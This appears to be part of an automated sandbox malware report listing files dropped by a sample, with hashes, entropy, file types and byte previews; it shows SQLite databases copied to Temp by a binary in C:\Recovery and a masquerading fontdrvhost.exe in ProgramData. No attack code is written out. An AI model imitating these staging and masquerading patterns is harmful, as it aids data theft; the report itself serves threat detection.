                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Wh2c6sgwRo.exe.log

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\Wh2c6sgwRo.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2045
                                                                                          Entropy (8bit):5.3618187964722885
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:MxHKQ71qHGIs0HKjJHiYHKGSI6oQHZHitHTHhAHKKkrHKoLHqHpHNpv:iq+wmj0qVCYqGSI6oQ5CtzHeqKkrqoLA
                                                                                          MD5:2880333ECF0A1010436F3B458AE3D931
                                                                                          SHA1:77BD788B221FEDAAC26D7822C9C129CAD7E8D9D9
                                                                                          SHA-256:1473EDC44F2DA62769AFFE97BD0E7882B48F9A4EA8325286DE80E2F27306592F
                                                                                          SHA-512:A2E1CBFE3D2CB2EF87217AEEB8504AF0D9247BC83FFC1B1BE3DBFCE32968CE1BDFE4637B50C7B4F744F52EABE8738F2D33207A70F61E75ADDB5B84724EEE6467
                                                                                          Malicious:true
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..2,"System.Web.Extensions, Version=4.0.0.0, Culture=

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\d3yngi1q.wji.exe.log

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1830
                                                                                          Entropy (8bit):5.3661116947161815
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
                                                                                          MD5:FE86BB9E3E84E6086797C4D5A9C909F2
                                                                                          SHA1:14605A3EA146BAB4EE536375A445B0214CD40A97
                                                                                          SHA-256:214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
                                                                                          SHA-512:07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fontdrvhost.exe.log

                                                                                          Download File
                                                                                          Process:C:\ProgramData\fontdrvhost.exe
                                                                                          File Type:CSV text
                                                                                          Category:dropped
                                                                                          Size (bytes):1281
                                                                                          Entropy (8bit):5.370111951859942
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):1.1940658735648508
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:NlllulxmH/lZ:NllUg
                                                                                          MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                                                          SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                                                          SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                                                          SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                                                          Malicious:false
                                                                                          Preview:@...e................................. ..............@..........

                                                                                          C:\Users\user\AppData\Local\Temp\1FAoHLPouJ

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\2iOPUPKeLU

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.1209886597424439
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                          MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                          SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                          SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                          SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\5wWZQCAHla

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\6I3KYvMc2T

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\6QFthbp1ni

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\BIc7YPWNl8

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\Bh4cWfQdak

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1373607036346451
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                                          MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                                          SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                                          SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                                          SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\D62glaN8t7

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.8475592208333753
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
                                                                                          MD5:BE99679A2B018331EACD3A1B680E3757
                                                                                          SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
                                                                                          SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
                                                                                          SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\HL5XKzvMjf

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\K4P7HG7zKP

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\RES459B.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d0, 10 symbols, created Tue Dec 10 08:22:27 2024, 1st section name ".debug$S"
                                                                                          Category:dropped
                                                                                          Size (bytes):1928
                                                                                          Entropy (8bit):4.616514247912043
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:HoK9AUaLzNZyQNHVwKRmNSlmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ecN:qUaLzqQNWKRmslmuulB+hnqXSfbNtmh7
                                                                                          MD5:9A7191E535FDB1075534404636082210
                                                                                          SHA1:2C6B474545FA7673C52428335E618EA909E1D55E
                                                                                          SHA-256:4401DED9F2FF9439C8D952D34D0D5CA151D901DDF4E99A07B0BCE37CA698880E
                                                                                          SHA-512:9E04C64437B8E804F7E8324313F2E46D1431C066888AA9F140E17EC8B292F65B753D91BC8803B121B68782855F34B60888F46FE2BF70C38ED3C7D41D418E670D
                                                                                          Malicious:false
                                                                                          Preview:L...C.Wg.............debug$S........X...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........Z....c:\Program Files (x86)\Microsoft\Edge\Application\CSCA62F8F92906C4C64B352C63DFBD9F59.TMP.....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES459B.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.

                                                                                          C:\Users\user\AppData\Local\Temp\RES4770.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Tue Dec 10 08:22:27 2024, 1st section name ".debug$S"
                                                                                          Category:dropped
                                                                                          Size (bytes):1952
                                                                                          Entropy (8bit):4.56007003034987
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:HgbW96XOIbjHzfwKRmNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:xUj0KRmEluOulajfqXSfbNtmh5Z
                                                                                          MD5:1F626A8A711786B60DC859C075C690D7
                                                                                          SHA1:61D5AE6ECDEE51CFF00A180A99CBEBF8760E36E6
                                                                                          SHA-256:5BA31F8B8FBD54FE51DB9A9AD35D80660B1DFB9F0B6CC272EFEB11DEF623AC02
                                                                                          SHA-512:21F5DE834643FED1A134ABCD2DEAEFCA08975E7AAA69230F033ADAF612700BB461D3ED525A72C9CBF1C8AF82F9FE93D811B387AE242D68207EEF3E31EE763F67
                                                                                          Malicious:false
                                                                                          Preview:L...C.Wg.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........<....c:\Windows\System32\CSC533681BDB06443E789816E6615DEB19.TMP..................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES4770.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.

                                                                                          C:\Users\user\AppData\Local\Temp\YXlvdEN7SI

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1oglssc4.oif.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ovb1ccp.oqg.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1r4k5vz5.rwm.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3etredvw.emc.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
